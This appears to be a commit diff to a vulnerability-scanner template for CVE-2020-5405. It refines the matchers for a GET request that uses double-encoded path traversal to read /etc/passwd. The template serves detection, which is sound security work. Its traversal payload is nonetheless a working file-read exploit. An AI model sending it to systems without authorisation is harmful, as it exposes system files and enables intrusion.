Update CVE-2020-5405.yaml
parent
ebcf1ec0f6
commit
8362fb3dc2
|
@ -11,11 +11,12 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
|
- '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
- type: word
|
- type: regex
|
||||||
words:
|
regex:
|
||||||
- "root:"
|
- "root:[x*]:0:0:"
|
||||||
|
part: body
|
||||||
|
|
Loading…
Reference in New Issue